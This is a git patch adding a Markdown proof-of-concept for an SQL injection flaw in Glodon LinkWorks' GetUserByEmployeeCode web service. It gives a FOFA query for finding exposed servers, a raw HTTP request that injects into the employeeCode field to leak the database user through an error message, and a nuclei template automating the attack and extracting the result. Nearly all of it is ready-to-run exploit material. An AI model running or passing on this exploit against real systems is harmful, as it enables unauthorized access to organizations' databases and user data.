From a40d040491cdfd92ce89c394e53ee39151c83e1c Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 30 Jan 2024 19:23:50 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=B9=BF=E8=81=94=E8=BE=BE-linkworks-?= =?UTF-8?q?gwgdwebservice=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...-linkworks-gwgdwebservice存在SQL注入漏洞.md | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 广联达-linkworks-gwgdwebservice存在SQL注入漏洞.md diff --git a/广联达-linkworks-gwgdwebservice存在SQL注入漏洞.md b/广联达-linkworks-gwgdwebservice存在SQL注入漏洞.md new file mode 100644 index 0000000..01f97df --- /dev/null +++ b/广联达-linkworks-gwgdwebservice存在SQL注入漏洞.md @@ -0,0 +1,64 @@ +## 广联达-linkworks-gwgdwebservice存在SQL注入漏洞 + +## fofa +``` +header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx" +``` + +## poc +``` +POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Connection: close +Content-Length: 41 + +employeeCode=1'-1/user--'&EncryptData=1 +``` + + +![97b447c33371470366be42d552d78d05](https://github.com/wy876/POC/assets/139549762/7cb76c0c-69d3-490c-bd72-fc62624cd7e0) + + +## nuclei +``` +id: glodon-linkworks-service-sqli +info: + name: glodon-linkworks-service-sqli + author: unknow + severity: critical + description: glodon-linkworks-gwgdwebservice 存在SQL注入漏洞。 + tags: glodon,sqli + metadata: + fofa-query: 'header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"' +http: + - raw: + - | + POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1 + Host: + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + + employeeCode=1'-1/{{sqli}}--'&EncryptData=1 + + payloads: + sqli: + - 'user' + + extractors: + - type: regex + part: body + name: sqli + group: 1 + regex: + - '在将 nvarchar 值 '(.*)' 转换成数据类型 int 时失败。' + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code_1==500 && contains(body_1, "在将 nvarchar 值") && contains(body_1, "转换成数据类型 int 时失败") ' + #&& contains(header_1, "text/html")' +```